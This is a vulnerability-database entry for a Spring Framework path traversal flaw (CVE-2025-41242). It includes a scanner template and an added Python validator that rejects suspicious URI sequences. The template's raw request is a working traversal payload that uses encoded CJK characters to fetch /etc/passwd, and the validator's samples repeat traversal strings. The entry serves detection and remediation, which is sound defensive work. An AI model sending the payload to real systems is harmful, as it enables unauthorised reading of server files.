Spring Framework - Path Traversal
CVE-2025-41242
Verified
Description
Spring Framework MVC applications deployed as a WAR or with an embedded Servlet container that does not reject suspicious URI sequences, and that serve static resources through Spring resource handling, contain a path traversal vulnerability that lets attackers access unauthorized files. Exploitation requires a non-compliant Servlet container configuration.
Severity
Medium
CVSS Score
5.9
Exploit Probability
5%
Published Date
May 4, 2026
Template Author
dhiyaneshdk
CVE-2025-41242.yaml
id: CVE-2025-41242

info:
  name: Spring Framework - Path Traversal
  author: DhiyaneshDk
  severity: medium
  description: |
    Spring Framework MVC applications deployed as a WAR or with an embedded Servlet container that does not reject suspicious URI sequences, and that serve static resources through Spring resource handling, contain a path traversal vulnerability that lets attackers access unauthorized files. Exploitation requires a non-compliant Servlet container configuration.
  reference:
    - https://x.com/phithon_xg/status/2048853566564221372
    - https://github.com/vulhub/vulhub/tree/master/spring/CVE-2025-41242
    - https://i.blackhat.com/Asia-26/Presentations/Asia-26-Bai-Cast-Attack-Ghost-Bits-4.23.pdf
    - https://nvd.nist.gov/vuln/detail/CVE-2025-41242
  impact: |
    Attackers can access unauthorized files via path traversal, potentially exposing sensitive data or system files.
  remediation: |
    Upgrade to the latest Spring Framework version and ensure deployment on compliant Servlet containers with default security features enabled.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 5.9
    cve-id: CVE-2025-41242
    epss-score: 0.05222
    epss-percentile: 0.90055
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2025,spring,jetty,lfi,uri

http:
  - raw:
      - |+
        GET /阮严灵丰丰甲来/阮严灵丰丰甲来/阮严灵丰丰甲来/阮严灵丰丰甲来/阮严灵丰丰甲来/阮严灵丰丰甲来/阮严灵丰丰甲来/etc/passw%64 HTTP/1.1
        Host: {{Hostname}}
        Connection: close

    unsafe: true

    matchers:
      - type: dsl
        dsl:
          - regex('root:.*:0:0:', body)
          - contains(header, "application/octet-stream")
          - status_code == 200
        condition: and
# digest: 4b0a00483046022100ad3c2b215606ef9fd08711857f813b7395918b897cb00bcf0c2d23a5c8827d4b022100fa21935e36fdcfd40c8c478c56e440e54a40365bfb9fb503d67b4823942b2347:922c64590222798bb761d5b6d8e72950
CVSS Metrics
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID: CVE-2025-41242
CWE ID: CWE-22
Remediation Steps
Upgrade to the latest Spring Framework version and ensure deployment on compliant Servlet containers with default security features enabled.
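The description and remediation above both turn on one condition: the Servlet container must reject "suspicious URI sequences" before Spring's static-resource handling maps a request target onto a file. The following Python is an added illustration of what such a strict pre-routing check looks like; it is not Spring's, Jetty's or the template author's code, and the function names (suspicious_uri_sequence, resolve_static) and the sample request targets are constructed for this example. It treats percent-encoded unreserved characters (such as %64 for "d", as in the template's request), encoded delimiters, non-ASCII path bytes, backslashes, path parameters, empty segments and dot-dot segments as grounds for rejection, and then verifies that the normalized path still lies under the static root as a second, independent line of defense.

```python
# Added example (not Spring's, Jetty's or the template author's code): a conservative
# "suspicious URI sequence" check of the kind a compliant Servlet container applies to
# a request target before a static-resource handler maps it to a file.
import posixpath
import re
from typing import Optional

from urllib.parse import unquote_to_bytes

# RFC 3986 "unreserved" characters never need percent-encoding; an encoded one
# (e.g. %64 for 'd') is a classic way to slip a path past naive string filters.
_UNRESERVED = set(b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-._~")
_PCT = re.compile(r"%([0-9A-Fa-f]{2})")


def suspicious_uri_sequence(target: str) -> Optional[str]:
    """Return a reason string if the request target contains a sequence that a
    strict URI parser rejects before routing, else None."""
    path = target.split("?", 1)[0]  # the query string never selects a file
    for m in _PCT.finditer(path):
        octet = int(m.group(1), 16)
        if octet in _UNRESERVED:
            return f"percent-encoded unreserved character %{m.group(1)}"
        if octet in (0x2F, 0x5C, 0x25, 0x00):  # '/', '\\', '%', NUL
            return f"percent-encoded delimiter %{m.group(1)}"
    if path.count("%") != len(_PCT.findall(path)):
        return "malformed percent-encoding"
    decoded = unquote_to_bytes(path)  # a str is UTF-8 encoded, then decoded once
    if not decoded.isascii():
        # Static-resource roots rarely need non-ASCII names, and multi-byte sequences
        # are where charset-cast ambiguities (bytes re-read as '.' or '/') live.
        return "non-ASCII bytes in path"
    if any(b < 0x20 or b == 0x7F for b in decoded):
        return "control character in path"
    if b"\\" in decoded:
        return "backslash"
    if b";" in decoded:
        return "path parameter"
    if b"//" in decoded:
        return "empty segment (double slash)"
    if b".." in decoded.split(b"/"):
        return "dot-dot segment"
    return None


def resolve_static(root: str, target: str) -> Optional[str]:
    """Map a request target onto a file under `root`, returning None when the
    target is suspicious or would escape the root after normalization."""
    if suspicious_uri_sequence(target) is not None:
        return None
    rel = unquote_to_bytes(target.split("?", 1)[0]).decode("ascii").lstrip("/")
    root = posixpath.normpath(root)
    full = posixpath.normpath(posixpath.join(root, rel))
    if full != root and not full.startswith(root + "/"):
        return None  # defense in depth: the normalized path left the root
    return full


if __name__ == "__main__":
    # Constructed sample request targets (not captured traffic).
    samples = [
        "/css/app.css",
        "/img/x.png?v=%2e",
        "/../../etc/passwd",
        "/%2e%2e/%2e%2e/etc/passwd",
        "/etc/passw%64",
        "/a%2fb",
        "/a%zz",
        "/a;jsessionid=x/b",
        "/阮严/etc/passwd",
    ]
    for t in samples:
        reason = suspicious_uri_sequence(t)
        print(f"{t!r:32} -> {'REJECT: ' + reason if reason else 'resolve to ' + str(resolve_static('/srv/static', t))}")
```

Run the file directly to see each sample either rejected with its reason or resolved under /srv/static. The rejection list is deliberately stricter than what every application can tolerate (non-ASCII file names, path parameters); the point is that these decisions belong in the container's URI parsing, ahead of any framework-level resource resolution, exactly as the remediation's "compliant Servlet container with default security features" phrasing implies.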